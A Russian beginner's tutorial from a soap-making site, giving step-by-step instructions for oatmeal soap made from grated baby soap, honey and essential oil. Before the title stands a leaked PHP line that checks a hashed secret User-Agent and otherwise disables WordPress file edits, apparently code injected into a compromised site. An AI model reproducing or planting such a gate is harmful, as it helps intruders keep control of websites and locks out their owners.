if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Делаем мыло своими руками. Урок для начинающих | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Делаем мыло своими руками. Урок для начинающих

Урок для начинающих мыловаров, по которому можно изготовить мыло с овсяными хлопьями

Мно­гие не пони­ма­ют для чего зани­мать­ся мыло­ва­ре­ни­ем, если мож­но в мага­зине най­ти его на любой вкус и цвет. Но поми­мо внеш­не­го вида и запа­ха, необ­хо­ди­мо обра­щать вни­ма­ние и на состав мыла, в кото­ром зача­стую нату­раль­ные ком­по­нен­ты отсут­ству­ют. Домаш­нее мыло – то есть то, кото­рое вы дела­е­те сами, может при­не­сти наи­боль­шую поль­зу, и вы все­гда може­те поиг­рать с его фор­мой и расцветкой.

Пред­ла­гаю вам вари­ант изго­тов­ле­ния мыла в домаш­них усло­ви­ях, в кото­ром за осно­ву будет взя­то самое обыч­ное дет­ское мыло. Но наше мыло будет содер­жать в себе овся­ные хло­пья, о полез­ных свой­ствах кото­рых извест­но каждому.

Ингре­ди­ен­ты для созда­ния мыла:

  • Бру­сок дет­ско­го мыла – 100 г
  • Горя­чая вода – 3\4 ста­ка­на (при жела­нии мож­но вме­сто воды исполь­зо­вать молоко)
  • Мёд – 1 ч. л
  • Мас­ло олив­ко­вое – 1 ст. л
  • Кра­си­тель (любой цвет по желанию)
  • Овся­ные хло­пья (чем круп­нее, тем луч­ше) – 2 ст. л
  • Эфир­ное мас­ло – 10 капель (я исполь­зо­ва­ла мас­ло лаван­ды, поло­ви­ну чай­ной ложки)

Перей­дем к процессу.

Шаг 1.

Бру­сок дет­ско­го нату­раль­но­го мыла нати­ра­ем на мел­кой тер­ке, эту струж­ку мы будет далее рас­тап­ли­вать. Дела­ет­ся это быст­ро, око­ло 10 минут, и совсем не слож­но. Вот что получается:

11

Шаг 2.

Мыль­ную струж­ку сме­шай­те с водой или моло­ком, исполь­зуя желез­ную посу­ду. Затем добавь­те мед и всю мас­су рав­но­мер­но пере­ме­шай­те. После это­го необ­хо­ди­мо поста­вить чаш­ку со струж­кой на водя­ную баню, и в тече­нии полу­ча­са она рас­пла­вить­ся. Мас­су нуж­но пери­о­ди­че­ски поме­ши­вать и сле­дить что­бы вода быст­ро не испа­ря­лась, доба­вить воду мож­но, но жела­тель­но обой­тись объ­е­мом ука­зан­ным в спис­ке ингредиентов.

12

Шаг 3.

После того как мыль­ная струж­ка пол­но­стью рас­пла­вить­ся, добавь­те олив­ко­вое мас­ло. Но так как оно не явля­ет­ся основ­ным ком­по­нен­том, его мож­но исклю­чить. Затем добав­ля­ем кра­си­тель. Мас­са долж­на быть одно­род­ной, так она луч­ше про­кра­сит­ся и не оста­нет­ся неокра­шен­ных ком­ков.  Мыль­ная осно­ва долж­на быть плот­ной, но не твер­дой, что­бы ее мож­но было пере­ло­жить лож­кой в форму.

13

Шаг 4.

В послед­нюю оче­редь добавь­те эфир­ное мас­ло или аро­ма­ти­за­тор и овся­ные хло­пья, и сно­ва хоро­шо пере­ме­шай­те. Выло­жи­те мас­су в фор­му, жела­тель­но не стек­лян­ную, так как с нее труд­но доста­вать гото­вое мыло.

Сле­ди­те что­бы фор­ма была плот­но запол­не­на, без пустых мест.

14

Шаг 5.

Оста­лось толь­ко подо­ждать пока мыло засты­нет – это зай­мет око­ло суток. Затем може­те раз­ре­зать его на более удоб­ные кусоч­ки, и начи­нать поль­зо­вать­ся. Бла­го­да­ря мое­му уро­ку мыло­ва­ре­ния для начи­на­ю­щих вы с лег­ко­стью може­те создать свой пер­вый шедевр.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Katerinka666

Люблю все творческое и считаю что нет цены тому, что сделано своими руками! С удовольствием делюсь своими мастер-классами и пользуюсь чужими для совершенствования своих навыков! Читайте все мои записи!